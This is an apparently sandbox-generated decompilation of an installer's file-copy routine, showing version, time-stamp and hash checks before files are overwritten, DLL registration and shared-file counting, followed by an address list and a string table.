						if(_v54 != 0) {
							goto L110;
						} else {
							E00456B58("Skipping due to \"onlyifdestfileexists\" flag.", _t925, _t930, _t1058, _t1061);
							goto L129;
						}
					}
				} else {
					E00456B58("Dest file exists.", _t925, _t930, _t1058, _t1061);
					if(( *(_v8 + 0x50) & 0x00000001) == 0) {
						_t1019 =  *0x49ad08; // 0x227cfac
						E00403494( &_v32, _t1019);
						_t930 =  &_v108;
						_v85 = E00453E14( &_v108, _v44, __eflags);
						__eflags = _v85;
						if(_v85 == 0) {
							E00456B58("Time stamp of existing file: (failed to read)", _t925,  &_v108, _t1058, _t1061);
						} else {
							E0046D2B0( &_v108,  &_v164);
							_v172 = _v164;
							_v168 = 0xb;
							_t930 = 0;
							E00456D64("Time stamp of existing file: %s", _t925, 0,  &_v172, _t1058, _t1061);
						}
						_t758 = _v8;
						__eflags =  *(_t758 + 0x50) & 0x00000002;
						if(( *(_t758 + 0x50) & 0x00000002) != 0) {
							_v87 = 1;
							goto L81;
						} else {
							_v87 = 0;
							__eflags = _v36;
							if(_v36 == 0) {
								E0042C7A8(_v16,  &_v164);
								_t930 =  &_v76;
								_v65 = E00451F1C(_v9,  &_v76, _v164, __eflags);
							} else {
								_t881 = _v36;
								__eflags =  *(_t881 + 0x48) & 0x00000001;
								_v65 = _t881 & 0xffffff00 | ( *(_t881 + 0x48) & 0x00000001) != 0x00000000;
								_v76 =  *(_v36 + 0x40);
								_v72 =  *(_v36 + 0x44);
							}
							__eflags = _v65;
							if(_v65 == 0) {
								E00456B58("Version of our file: (none)", _t925, _t930, _t1058, _t1061);
							} else {
								_v204 = _v74 & 0x0000ffff;
								_v200 = 0;
								_v196 = _v76 & 0x0000ffff;
								_v192 = 0;
								_v188 = _v70 & 0x0000ffff;
								_v184 = 0;
								_v180 = _v72 & 0x0000ffff;
								_v176 = 0;
								E00456D64("Version of our file: %u.%u.%u.%u", _t925, 3,  &_v204, _t1058, _t1061);
							}
							E0042C7A8(_v44,  &_v164);
							_t930 =  &_v84;
							_t824 = E00451F1C(_v9,  &_v84, _v164, __eflags);
							__eflags = _t824;
							if(_t824 == 0) {
								E00456B58("Version of existing file: (none)", _t925,  &_v84, _t1058, _t1061);
								__eflags = _v65;
								if(_v65 == 0) {
									_v87 = 1;
								}
								goto L81;
							} else {
								_v204 = _v82 & 0x0000ffff;
								_v200 = 0;
								_v196 = _v84 & 0x0000ffff;
								_v192 = 0;
								_v188 = _v78 & 0x0000ffff;
								_v184 = 0;
								_v180 = _v80 & 0x0000ffff;
								_v176 = 0;
								_t930 = 3;
								E00456D64("Version of existing file: %u.%u.%u.%u", _t925, 3,  &_v204, _t1058, _t1061);
								__eflags = _v65;
								if(_v65 == 0) {
									L60:
									_t833 = _v8;
									 *(_t833 + 0x50) & 0x00000004 = (_t833 & 0xffffff00 | ( *(_t833 + 0x50) & 0x00000004) != 0x00000000) ^ 0x00000001 | _v86;
									if(((_t833 & 0xffffff00 | ( *(_t833 + 0x50) & 0x00000004) != 0x00000000) ^ 0x00000001 | _v86) != 0) {
										L62:
										E00456B58("Existing file is a newer version. Skipping.", _t925, _t930, _t1058, _t1061);
										goto L129;
									} else {
										E00403494( &_v164, _v44);
										E0040357C( &_v164, 0x470798);
										_t1040 =  *0x49ad40; // 0x227d2f0
										E0040357C( &_v164, _t1040);
										_t930 = 2;
										_t846 = E0047D0CC(_v164, _t925, 2, 0, _t1058, _t1061, 6, 1, 4);
										__eflags = _t846 - 7;
										if(_t846 == 7) {
											goto L81;
										} else {
											goto L62;
										}
									}
								} else {
									__eflags = _v84 - _v76;
									if(_v84 > _v76) {
										goto L60;
									} else {
										__eflags = _v84 - _v76;
										if(_v84 != _v76) {
											L63:
											__eflags = _v84 - _v76;
											if(_v84 != _v76) {
												L81:
												__eflags = _v87;
												if(_v87 == 0) {
													L92:
													E00403400( &_v32);
													__eflags = _v86;
													if(_v86 == 0) {
														__eflags =  *(_v8 + 0x4e) & 0x00000001;
														if(__eflags == 0) {
															goto L97;
														} else {
															E00403494( &_v164, _v44);
															E0040357C( &_v164, 0x470798);
															_t1027 =  *0x49ad58; // 0x227d604
															E0040357C( &_v164, _t1027);
															_t930 = 1;
															__eflags = E0047D0CC(_v164, _t925, 1, 0, _t1058, _t1061, 7, 1, 4) - 6;
															if(__eflags == 0) {
																while(1) {
																	L97:
																	_t925 = E00451E40(_v9, _v44, __eflags);
																	__eflags = _t925 - 0xffffffff;
																	if(_t925 == 0xffffffff) {
																		break;
																	}
																	__eflags = _t925 & 0x00000001;
																	if((_t925 & 0x00000001) == 0) {
																		break;
																	} else {
																		__eflags =  *(_v8 + 0x4f) & 0x00000004;
																		if(__eflags != 0) {
																			L102:
																			_t1022 =  *0x49acdc; // 0x227cd60
																			E00403494( &_v32, _t1022);
																			_t930 = _t925 & 0xfffffffe;
																			_t768 = E004521E8(_v9, _t925 & 0xfffffffe, _v44, __eflags);
																			__eflags = _t768;
																			if(_t768 == 0) {
																				E00456B58("Failed to strip read-only attribute.", _t925, _t930, _t1058, _t1061);
																			} else {
																				E00456B58("Stripped read-only attribute.", _t925, _t930, _t1058, _t1061);
																			}
																			__eflags =  *(_v8 + 0x4f) & 0x00000004;
																			if(__eflags != 0) {
																				break;
																			} else {
																				continue;
																			}
																		} else {
																			_t1024 =  *0x49ad44; // 0x227d3a0
																			_t775 = E0046D1C0(_v44, _t925, _t930, _t1024, _t1058, _t1061, __eflags);
																			__eflags = _t775;
																			if(_t775 == 0) {
																				goto L102;
																			} else {
																				E00456B58("User opted not to strip the existing file\'s read-only attribute. Skipping.", _t925, _t930, _t1058, _t1061);
																				goto L129;
																			}
																		}
																	}
																	goto L166;
																}
																L110:
																E00456B58("Installing the file.", _t925, _t930, _t1058, _t1061);
																E00403494( &_v40, _v16);
																__eflags = _v9 -  *0x49b37b; // 0x0
																if(__eflags != 0) {
																	_v57 = 0;
																} else {
																	__eflags = _v40;
																	if(_v40 == 0) {
																		_t930 =  &_v164;
																		_t925 =  *_a8;
																		 *((intOrPtr*)( *_a8 + 0xc))();
																		__eflags = _v164;
																		if(__eflags != 0) {
																			_t930 =  &_v208;
																			_t925 =  *_a8;
																			 *((intOrPtr*)( *_a8 + 0xc))();
																			_t651 = E00452100(_v9, _v208, __eflags);
																			__eflags = _t651;
																			if(_t651 != 0) {
																				_t930 =  &_v40;
																				_t925 =  *_a8;
																				 *((intOrPtr*)( *_a8 + 0xc))();
																			}
																		}
																	}
																	__eflags = _v40;
																	_v57 = _v40 == 0;
																}
																_t976 =  *0x49ace8; // 0x227ce34
																E00403494( &_v32, _t976);
																E0042C8F8(_v44, _t930,  &_v164);
																E00452B10(_v9, _t925, 0x470b10, _v164, _t1058, _t1061,  &_v48); // executed
																E0042C848(_v48, 0x470b10,  &_v164);
																_t932 =  *0x470b18; // 0x0
																E0046E738(_v9, _t925, _t932, _v164, _t1058, _t1061, __eflags, _a16); // executed
																_t597 = E004522DC(_v9, 1, 0, 2, 0, _v48); // executed
																_v112 = _t597;
																_push(_t1063);
																_push(0x46fe10);
																_push( *[fs:eax]);
																 *[fs:eax] = _t1065;
																_v56 = 1;
																_push(_t1063);
																_push(0x46fd65);
																_push( *[fs:eax]);
																 *[fs:eax] = _t1065;
																_v17 = 1;
																_t982 =  *0x49ad0c; // 0x227cff4
																E00403494( &_v32, _t982);
																__eflags = _v40;
																if(_v40 != 0) {
																	_t604 = E004522DC(_v9, 1, 1, 0, 2, _v40); // executed
																	_v116 = _t604;
																	_push(_t1063);
																	_push(0x46fd54);
																	_push( *[fs:eax]);
																	 *[fs:eax] = _t1065;
																	_t984 =  *0x49ace0; // 0x227cdbc
																	E00403494( &_v32, _t984);
																	__eflags = _v36;
																	if(_v36 == 0) {
																		E0046D3F4(_v116, _a4, _v112);
																	} else {
																		E0046D3F4(_v116, _v36 + 0x14, _v112);
																	}
																	__eflags = 0;
																	_pop(_t986);
																	 *[fs:eax] = _t986;
																	_push(0x46fd5b);
																	return E00402B58(_v116);
																} else {
																	E0046C884(E0046C0CC(), _t925, 0x46d1b4, _v36, _t1058, _t1061); // executed
																	_t989 =  *0x49ace0; // 0x227cdbc
																	E00403494( &_v32, _t989);
																	__eflags =  *(_v8 + 0x50) & 0x00000080;
																	E0046CB9C(E0046C0CC(), _t925, _v112, _v36, _t1058, _t1061, (_v8 & 0xffffff00 | __eflags != 0x00000000) ^ 0x00000001, 0x46d1b4); // executed
																	_pop(_t991);
																	 *[fs:eax] = _t991;
																	SetFileTime( *(_v112 + 4), 0, 0,  &_v100); // executed
																	_t630 = _v8;
																	__eflags =  *((char*)(_t630 + 0x52)) - 1;
																	if( *((char*)(_t630 + 0x52)) == 1) {
																		_v57 = 0;
																		E0046ED68(_v112, 0x6e556e49); // executed
																		_v172 =  *((intOrPtr*)(0x498ac8 + ( *(_a16 - 9) & 0x000000ff) * 4));
																		_v168 = 0xb;
																		E00456D64("Uninstaller requires administrator: %s", _t925, 0,  &_v172, _t1058, _t1061);
																		__eflags =  *0x49b29f & 0x00000002;
																		if(( *0x49b29f & 0x00000002) == 0) {
																			__eflags =  *0x49b0d9;
																			if(__eflags == 0) {
																				E0046ED94(_v112, 0,  &_v172, __eflags, _a16); // executed
																			}
																		}
																	}
																	__eflags = 0;
																	_pop(_t992);
																	 *[fs:eax] = _t992;
																	_push(0x46fe17);
																	return E00402B58(_v112);
																}
															} else {
																E00456B58("User opted not to overwrite the existing file. Skipping.", _t925, 1, _t1058, _t1061);
																goto L129;
															}
														}
													} else {
														E00456B58("Existing file is protected by Windows File Protection. Skipping.", _t925, _t930, _t1058, _t1061);
														goto L129;
													}
												} else {
													_t790 = _v8;
													__eflags =  *(_t790 + 0x4e) & 0x00000080;
													if(( *(_t790 + 0x4e) & 0x00000080) == 0) {
														goto L92;
													} else {
														__eflags = _t925;
														if(_t925 == 0) {
															L85:
															E00456B58("Couldn\'t read time stamp. Skipping.", _t925, _t930, _t1058, _t1061);
															goto L129;
														} else {
															__eflags = _v85;
															if(_v85 != 0) {
																_t795 = CompareFileTime( &_v108,  &_v100);
																__eflags = _t795;
																if(_t795 != 0) {
																	_t798 = CompareFileTime( &_v108,  &_v100);
																	__eflags = _t798;
																	if(_t798 <= 0) {
																		goto L92;
																	} else {
																		_t799 = _v8;
																		 *(_t799 + 0x50) & 0x00000004 = (_t799 & 0xffffff00 | ( *(_t799 + 0x50) & 0x00000004) != 0x00000000) ^ 0x00000001 | _v86;
																		if(((_t799 & 0xffffff00 | ( *(_t799 + 0x50) & 0x00000004) != 0x00000000) ^ 0x00000001 | _v86) != 0) {
																			L91:
																			E00456B58("Existing file has a later time stamp. Skipping.", _t925, _t930, _t1058, _t1061);
																			goto L129;
																		} else {
																			E00403494( &_v164, _v44);
																			E0040357C( &_v164, 0x470798);
																			_t1031 =  *0x49ad40; // 0x227d2f0
																			E0040357C( &_v164, _t1031);
																			_t930 = 2;
																			_t812 = E0047D0CC(_v164, _t925, 2, 0, _t1058, _t1061, 6, 1, 4);
																			__eflags = _t812 - 7;
																			if(_t812 == 7) {
																				goto L92;
																			} else {
																				goto L91;
																			}
																		}
																	}
																} else {
																	E00456B58("Same time stamp. Skipping.", _t925, _t930, _t1058, _t1061);
																	goto L129;
																}
															} else {
																goto L85;
															}
														}
													}
												}
											} else {
												__eflags = _v80 - _v72;
												if(_v80 != _v72) {
													goto L81;
												} else {
													_t851 = _v8;
													__eflags =  *(_t851 + 0x4f) & 0x00000008;
													if(( *(_t851 + 0x4f) & 0x00000008) != 0) {
														goto L81;
													} else {
														_t852 = _v8;
														__eflags =  *(_t852 + 0x50) & 0x00000040;
														if(( *(_t852 + 0x50) & 0x00000040) == 0) {
															_t853 = _v8;
															__eflags =  *(_t853 + 0x4e) & 0x00000080;
															if(( *(_t853 + 0x4e) & 0x00000080) != 0) {
																_v87 = 1;
																goto L81;
															} else {
																E00456B58("Same version. Skipping.", _t925, _t930, _t1058, _t1061);
																goto L129;
															}
														} else {
															_t930 =  &_v160;
															_t857 = E0046D39C(_v9,  &_v160, _v44);
															__eflags = _t857;
															if(_t857 == 0) {
																E00456B58("Failed to read existing file\'s SHA-1 hash. Proceeding.", _t925,  &_v160, _t1058, _t1061);
																goto L81;
															} else {
																__eflags = _v36;
																if(_v36 == 0) {
																	_t1043 =  *0x49ad0c; // 0x227cff4
																	E00403494( &_v32, _t1043);
																	_t930 =  &_v140;
																	E00453F04(_v9, _t925,  &_v140, _v16, _t1061);
																	_t1045 =  *0x49ad08; // 0x227cfac
																	E00403494( &_v32, _t1045);
																} else {
																	_t1061 = _v36 + 0x24;
																	memcpy( &_v140, _t1061, 5 << 2);
																	_t1065 = _t1065 + 0xc;
																	_t1058 = _t1061 + 0xa;
																	_t930 = 0;
																}
																_t867 = E00430DAC( &_v160,  &_v140);
																__eflags = _t867;
																if(_t867 == 0) {
																	E00456B58("Existing file\'s SHA-1 hash is different from our file. Proceeding.", _t925, _t930, _t1058, _t1061);
																	goto L81;
																} else {
																	E00456B58("Existing file\'s SHA-1 hash matches our file. Skipping.", _t925, _t930, _t1058, _t1061);
																	goto L129;
																}
															}
														}
													}
												}
											}
										} else {
											__eflags = _v80 - _v72;
											if(_v80 <= _v72) {
												goto L63;
											} else {
												goto L60;
											}
										}
									}
								}
							}
						}
					} else {
						E00456B58("Skipping due to \"onlyifdoesntexist\" flag.", _t925, _t930, _t1058, _t1061);
						L129:
						if(( *(_v8 + 0x4e) & 0x00000010) != 0) {
							L131:
							if(E00452100(_v9, _v44, _t1097) != 0) {
								E00403400( &_v32);
								_t731 = _v8;
								_t1099 =  *(_t731 + 0x4e) & 0x00000020;
								if(( *(_t731 + 0x4e) & 0x00000020) == 0) {
									E00456B58("Will register the file (a DLL/OCX) later.", _t925, _t930, _t1058, _t1061);
								} else {
									E00456B58("Will register the file (a type library) later.", _t925, _t930, _t1058, _t1061);
								}
								_t925 = E00403B80(_t1099);
								E00403450(_t925, _t925, _v44, _t1058, _t1061);
								 *((char*)(_t925 + 4)) = _v9;
								 *((char*)(_t925 + 5)) = _v8 & 0xffffff00 | ( *(_v8 + 0x4e) & 0x00000020) != 0x00000000;
								 *((char*)(_t925 + 6)) = _v8 & 0xffffff00 | ( *(_v8 + 0x4f) & 0x00000040) != 0x00000000;
								E0040B388( *((intOrPtr*)(_a16 - 0x18)), _t925);
							}
						} else {
							_t748 = _v8;
							_t1097 =  *(_t748 + 0x4e) & 0x00000020;
							if(( *(_t748 + 0x4e) & 0x00000020) != 0) {
								goto L131;
							}
						}
						if(( *(_v8 + 0x4e) & 0x00000040) != 0) {
							E00403400( &_v32);
							_t1104 = _v9;
							if(_v9 == 0) {
								E00456B58("Incrementing shared file count (32-bit).", _t925, _t930, _t1058, _t1061);
								E00453744(_t925, _v54, _v44, _t1058, _t1061, __eflags);
							} else {
								E00456B58("Incrementing shared file count (64-bit).", _t925, _t930, _t1058, _t1061);
								E00453744(_t925, _v54, _v44, _t1058, _t1061, _t1104);
							}
							if(( *(_v8 + 0x4e) & 0x00000002) != 0) {
								__eflags = _v9;
								if(_v9 == 0) {
									_v232 = _v44;
									E004595A0( *((intOrPtr*)(_a16 - 4)), _t925,  &_v232, 0x8a, _t1058, _t1061, 0, 0);
								} else {
									_v232 = _v44;
									E004595A0( *((intOrPtr*)(_a16 - 4)), _t925,  &_v232, 0x8a, _t1058, _t1061, 1, 0);
								}
							} else {
								_v92 = _v92 | 0x00000008;
								if(_v9 != 0) {
									_v92 = _v92 | 0x00000400;
								}
								if(( *(_v8 + 0x51) & 0x00000001) != 0) {
									_v92 = _v92 | 0x00000200;
								}
								_v228 = _v44;
								_v224 = _v48;
								_v220 =  *((intOrPtr*)(_v8 + 8));
								_v216 = _v52;
								_v212 =  *((intOrPtr*)(_v8 + 0xc));
								E004595A0( *((intOrPtr*)(_a16 - 4)), _t925,  &_v228, 0x82, _t1058, _t1061, _v92, 4);
							}
						}
						E00403400( &_v32);
						if(_v48 == 0) {
							_t948 =  *((short*)(_v8 + 0x4c));
							E0046F114(_v9,  *((short*)(_v8 + 0x4c)), _v44, _t1058);
						} else {
							_t948 =  *((short*)(_v8 + 0x4c));
							E0046F114(_v9,  *((short*)(_v8 + 0x4c)), _v48, _t1058);
						}
						_t926 = _t925 & 0xffffff00 | ( *(_v8 + 0x51) & 0x00000020) != 0x00000000;
						if(_t926 != 0 || ( *(_v8 + 0x51) & 0x00000040) != 0) {
							E00403400( &_v32);
							if(_v48 == 0) {
								_t669 = _v8;
								 *(_t669 + 0x51) & 0x00000020 = ( *(_t669 + 0x51) & 0x00000020) != 0;
								_t948 = _t926;
								E0046F1FC(_v9, _t926, _v44, _t1058);
							} else {
								_t948 = _t926;
								E0046F1FC(_v9, _t926, _v48, _t1058);
							}
						}
						if(( *(_v8 + 0x51) & 0x00000080) == 0) {
							_pop(_t1002);
							 *[fs:eax] = _t1002;
							_pop(_t1003);
							 *[fs:eax] = _t1003;
							_push(0x470407);
							__eflags = _v56;
							if(__eflags != 0) {
								return E00451C68(_v9, _v48, __eflags);
							}
							return 0;
						} else {
							E00456B58("Installing into GAC", _t926, _t948, _t1058, _t1061);
							_v120 = E00458B20(_t926, 0, 1, _t1058, _t1061);
							_push(_t1063);
							_push(0x4703a6);
							_push( *[fs:eax]);
							 *[fs:eax] = _t1065;
							_t1117 = _v48;
							if(_v48 == 0) {
								E00458D64(_v120, _t926, _v44, _t1058, _t1061, __eflags);
							} else {
								E00458D64(_v120, _t926, _v48, _t1058, _t1061, _t1117);
							}
							_pop(_t1007);
							 *[fs:eax] = _t1007;
							_push(0x4703ad);
							return E00402B58(_v120);
						}
					}
				}
				L166:
			}

0x0046f304
0x0046f304
0x0046f304
0x0046f305
0x0046f307
0x0046f30d
0x0046f30e
0x0046f30f
0x0046f312
0x0046f318
0x0046f31e
0x0046f321
0x0046f324
0x0046f327
0x0046f32a
0x0046f32d
0x0046f330
0x0046f333
0x0046f336
0x0046f33c
0x0046f344
0x0046f34b
0x0046f34c
0x0046f351
0x0046f354
0x0046f35c
0x0046f361
0x0046f365
0x0046f36c
0x0046f372
0x0046f385
0x0046f387
0x0046f374
0x0046f376
0x0046f380
0x0046f380
0x0046f38d
0x0046f395
0x0046f39a
0x0046f39e
0x0046f3a2
0x0046f3a8
0x0046f3ab
0x0046f3b1
0x0046f3b7
0x0046f3bf
0x0046f3c6
0x0046f3c7
0x0046f3cc
0x0046f3cf
0x0046f3d4
0x0046f3d5
0x0046f3da
0x0046f3dd
0x0046f3e0
0x0046f3e6
0x0046f3ed
0x0046f3ef
0x0046f3ef
0x0046f3fd
0x0046f3ff
0x0046f3ff
0x0046f40a
0x0046f40c
0x0046f40c
0x0046f417
0x0046f419
0x0046f419
0x0046f427
0x0046f429
0x0046f429
0x0046f437
0x0046f439
0x0046f439
0x0046f443
0x0046f44a
0x0046f44b
0x0046f450
0x0046f453
0x0046f456
0x0046f45c
0x0046f45e
0x0046f470
0x0046f474
0x0046f48c
0x0046f476
0x0046f47f
0x0046f47f
0x0046f460
0x0046f463
0x0046f469
0x0046f469
0x0046f49a
0x0046f4a8
0x0046f4af
0x0046f4b2
0x0046f4d3
0x0046f4db
0x0046f4e1
0x0046f4ee
0x0046f4f5
0x0046f4fd
0x0046f503
0x0046f509
0x0046f51c
0x0046f50b
0x0046f510
0x0046f510
0x0046f509
0x0046f521
0x0046f52c
0x0046f540
0x0046f547
0x0046f54e
0x0046f55a
0x0046f55a
0x0046f55a
0x0046f55a
0x0046f547
0x0046f564
0x0046f569
0x0046f570
0x0046f575
0x0046f578
0x0046f578
0x0046f580
0x0046f582
0x0046f582
0x0046f58a
0x0046f5ba
0x0046f5c8
0x0046f58c
0x0046f593
0x0046f5ad
0x0046f5ad
0x0046f5b1
0x0046f595
0x0046f595
0x0046f59b
0x0046f5a1
0x0046f5a1
0x0046f5b6
0x0046f5b6
0x0046f5cc
0x0046f608
0x0046f5ce
0x0046f5d7
0x0046f5e2
0x0046f5e8
0x0046f5f5
0x0046f5fc
0x0046f5fc
0x0046f611
0x0046fb47
0x0046fb4a
0x0046fb4e
0x00000000
0x0046fb50
0x0046fb50
0x0046fb54
0x00000000
0x0046fb56
0x0046fb5b
0x00000000
0x0046fb5b
0x0046fb54
0x0046f617
0x0046f61c
0x0046f628
0x0046f63c
0x0046f642
0x0046f647
0x0046f655
0x0046f658
0x0046f65c
0x0046f698
0x0046f65e
0x0046f667
0x0046f672
0x0046f678
0x0046f685
0x0046f68c
0x0046f68c
0x0046f69d
0x0046f6a0
0x0046f6a4
0x0046f96c
0x00000000
0x0046f6aa
0x0046f6aa
0x0046f6ae
0x0046f6b2
0x0046f6de
0x0046f6e9
0x0046f6f4
0x0046f6b4
0x0046f6b4
0x0046f6b7
0x0046f6be
0x0046f6c7
0x0046f6d0
0x0046f6d0
0x0046f6f7
0x0046f6fb
0x0046f75d
0x0046f6fd
0x0046f701
0x0046f707
0x0046f712
0x0046f718
0x0046f723
0x0046f729
0x0046f734
0x0046f73a
0x0046f751
0x0046f751
0x0046f76b
0x0046f776
0x0046f77c
0x0046f781
0x0046f783
0x0046f95b
0x0046f960
0x0046f964
0x0046f966
0x0046f966
0x00000000
0x0046f789
0x0046f78d
0x0046f793
0x0046f79e
0x0046f7a4
0x0046f7af
0x0046f7b5
0x0046f7c0
0x0046f7c6
0x0046f7d3
0x0046f7dd
0x0046f7e2
0x0046f7e6
0x0046f800
0x0046f800
0x0046f80c
0x0046f80f
0x0046f85e
0x0046f863
0x00000000
0x0046f811
0x0046f820
0x0046f830
0x0046f83b
0x0046f841
0x0046f84c
0x0046f850
0x0046f855
0x0046f858
0x00000000
0x00000000
0x00000000
0x00000000
0x0046f858
0x0046f7e8
0x0046f7eb
0x0046f7ee
0x00000000
0x0046f7f0
0x0046f7f3
0x0046f7f6
0x0046f86d
0x0046f870
0x0046f873
0x0046f970
0x0046f970
0x0046f974
0x0046fa3a
0x0046fa3d
0x0046fa42
0x0046fa46
0x0046fa5a
0x0046fa5e
0x00000000
0x0046fa60
0x0046fa6f
0x0046fa7f
0x0046fa8a
0x0046fa90
0x0046fa9b
0x0046faa4
0x0046faa7
0x0046fab8
0x0046fab8
0x0046fac3
0x0046fac5
0x0046fac8
0x00000000
0x00000000
0x0046face
0x0046fad1
0x00000000
0x0046fad7
0x0046fada
0x0046fade
0x0046fb01
0x0046fb04
0x0046fb0a
0x0046fb11
0x0046fb1a
0x0046fb1f
0x0046fb21
0x0046fb34
0x0046fb23
0x0046fb28
0x0046fb28
0x0046fb3c
0x0046fb40
0x00000000
0x0046fb42
0x00000000
0x0046fb42
0x0046fae0
0x0046fae0
0x0046fae9
0x0046faee
0x0046faf0
0x00000000
0x0046faf2
0x0046faf7
0x00000000
0x0046faf7
0x0046faf0
0x0046fade
0x00000000
0x0046fad1
0x0046fb65
0x0046fb6a
0x0046fb75
0x0046fb7d
0x0046fb83
0x0046fbe9
0x0046fb85
0x0046fb85
0x0046fb89
0x0046fb8b
0x0046fb9a
0x0046fb9c
0x0046fb9f
0x0046fba6
0x0046fba8
0x0046fbb7
0x0046fbb9
0x0046fbc5
0x0046fbca
0x0046fbcc
0x0046fbce
0x0046fbda
0x0046fbdc
0x0046fbdc
0x0046fbcc
0x0046fba6
0x0046fbdf
0x0046fbe3
0x0046fbe3
0x0046fbf0
0x0046fbf6
0x0046fc08
0x0046fc1b
0x0046fc2d
0x0046fc38
0x0046fc41
0x0046fc5b
0x0046fc60
0x0046fc65
0x0046fc66
0x0046fc6b
0x0046fc6e
0x0046fc71
0x0046fc77
0x0046fc78
0x0046fc7d
0x0046fc80
0x0046fc83
0x0046fc8a
0x0046fc90
0x0046fc95
0x0046fc99
0x0046fcf3
0x0046fcf8
0x0046fcfd
0x0046fcfe
0x0046fd03
0x0046fd06
0x0046fd0c
0x0046fd12
0x0046fd17
0x0046fd1b
0x0046fd39
0x0046fd1d
0x0046fd29
0x0046fd29
0x0046fd3e
0x0046fd40
0x0046fd43
0x0046fd46
0x0046fd53
0x0046fc9b
0x0046fca8
0x0046fcb0
0x0046fcb6
0x0046fcc3
0x0046fcd8
0x0046fd5d
0x0046fd60
0x0046fd8f
0x0046fd94
0x0046fd97
0x0046fd9b
0x0046fd9d
0x0046fda9
0x0046fdbc
0x0046fdc2
0x0046fdd6
0x0046fddb
0x0046fde2
0x0046fde4
0x0046fdeb
0x0046fdf4
0x0046fdf9
0x0046fdeb
0x0046fde2
0x0046fdfa
0x0046fdfc
0x0046fdff
0x0046fe02
0x0046fe0f
0x0046fe0f
0x0046faa9
0x0046faae
0x00000000
0x0046faae
0x0046faa7
0x0046fa48
0x0046fa4d
0x00000000
0x0046fa4d
0x0046f97a
0x0046f97a
0x0046f97d
0x0046f981
0x00000000
0x0046f987
0x0046f987
0x0046f989
0x0046f991
0x0046f996
0x00000000
0x0046f98b
0x0046f98b
0x0046f98f
0x0046f9a8
0x0046f9ad
0x0046f9af
0x0046f9c8
0x0046f9cd
0x0046f9cf
0x00000000
0x0046f9d1
0x0046f9d1
0x0046f9dd
0x0046f9e0
0x0046fa2b
0x0046fa30
0x00000000
0x0046f9e2
0x0046f9f1
0x0046fa01
0x0046fa0c
0x0046fa12
0x0046fa1d
0x0046fa21
0x0046fa26
0x0046fa29
0x00000000
0x00000000
0x00000000
0x00000000
0x0046fa29
0x0046f9e0
0x0046f9b1
0x0046f9b6
0x00000000
0x0046f9b6
0x00000000
0x00000000
0x00000000
0x0046f98f
0x0046f989
0x0046f981
0x0046f879
0x0046f87c
0x0046f87f
0x00000000
0x0046f885
0x0046f885
0x0046f888
0x0046f88c
0x00000000
0x0046f892
0x0046f892
0x0046f895
0x0046f899
0x0046f938
0x0046f93b
0x0046f93f
0x0046f950
0x00000000
0x0046f941
0x0046f946
0x00000000
0x0046f946
0x0046f89f
0x0046f89f
0x0046f8ab
0x0046f8b0
0x0046f8b2
0x0046f931
0x00000000
0x0046f8b4
0x0046f8b4
0x0046f8b8
0x0046f8d2
0x0046f8d8
0x0046f8dd
0x0046f8e9
0x0046f8f1
0x0046f8f7
0x0046f8ba
0x0046f8bd
0x0046f8cb
0x0046f8cb
0x0046f8cb
0x0046f8cb
0x0046f8cb
0x0046f908
0x0046f90d
0x0046f90f
0x0046f925
0x00000000
0x0046f911
0x0046f916
0x00000000
0x0046f916
0x0046f90f
0x0046f8b2
0x0046f899
0x0046f88c
0x0046f87f
0x0046f7f8
0x0046f7fb
0x0046f7fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0046f7fe
0x0046f7f6
0x0046f7ee
0x0046f7e6
0x0046f783
0x0046f62a
0x0046f62f
0x00470116
0x0047011d
0x00470128
0x00470135
0x0047013a
0x0047013f
0x00470142
0x00470146
0x00470159
0x00470148
0x0047014d
0x0047014d
0x0047016d
0x00470174
0x0047017c
0x00470189
0x00470196
0x004701a1
0x004701a1
0x0047011f
0x0047011f
0x00470122
0x00470126
0x00000000
0x00000000
0x00470126
0x004701ad
0x004701b6
0x004701bb
0x004701bf
0x004701df
0x004701ec
0x004701c1
0x004701c6
0x004701d3
0x004701d3
0x004701f8
0x0047026b
0x0047026f
0x0047029c
0x004702b2
0x00470271
0x00470278
0x0047028e
0x0047028e
0x004701fa
0x004701fa
0x00470202
0x00470204
0x00470204
0x00470212
0x00470214
0x00470214
0x00470224
0x0047022d
0x00470239
0x00470242
0x0047024e
0x00470264
0x00470264
0x004701f8
0x004702ba
0x004702c3
0x004702dc
0x004702e6
0x004702c5
0x004702c8
0x004702d2
0x004702d2
0x004702f2
0x004702f7
0x00470305
0x0047030e
0x00470329
0x00470330
0x00470333
0x0047033b
0x00470310
0x0047031a
0x00470322
0x00470322
0x0047030e
0x00470347
0x004703af
0x004703b2
0x004703e3
0x004703e6
0x004703e9
0x004703ee
0x004703f2
0x00000000
0x004703fa
0x004703ff
0x00470349
0x0047034e
0x00470361
0x00470366
0x00470367
0x0047036c
0x0047036f
0x00470372
0x00470376
0x0047038b
0x00470378
0x0047037e
0x0047037e
0x00470392
0x00470395
0x00470398
0x004703a5
0x004703a5
0x00470347
0x0046f628
0x00000000

Strings

Will register the file (a DLL/OCX) later., xrefs: 00470154
Uninstaller requires administrator: %s, xrefs: 0046FDD1
Couldn't read time stamp. Skipping., xrefs: 0046F991
@, xrefs: 0046F40C
, xrefs: 0046F82B, 0046F9FC, 0046FA7A
Existing file has a later time stamp. Skipping., xrefs: 0046FA2B
User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FAF2
Will register the file (a type library) later., xrefs: 00470148
-- File entry --, xrefs: 0046F357
Dest filename: %s, xrefs: 0046F4F0
Version of existing file: (none), xrefs: 0046F956
Skipping due to "onlyifdestfileexists" flag., xrefs: 0046FB56
Version of our file: %u.%u.%u.%u, xrefs: 0046F74C
Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046F92C
Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046F911
Dest file is protected by Windows File Protection., xrefs: 0046F549
.tmp, xrefs: 0046FC13
Installing the file., xrefs: 0046FB65
Version of our file: (none), xrefs: 0046F758
Skipping due to "onlyifdoesntexist" flag., xrefs: 0046F62A
Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046F920
InUn, xrefs: 0046FDA1
Version of existing file: %u.%u.%u.%u, xrefs: 0046F7D8
Same time stamp. Skipping., xrefs: 0046F9B1
Stripped read-only attribute., xrefs: 0046FB23
Dest file exists., xrefs: 0046F617
Failed to strip read-only attribute., xrefs: 0046FB2F
Same version. Skipping., xrefs: 0046F941
Non-default bitness: 64-bit, xrefs: 0046F50B
Existing file is a newer version. Skipping., xrefs: 0046F85E
Time stamp of our file: %s, xrefs: 0046F5F7
Time stamp of existing file: (failed to read), xrefs: 0046F693
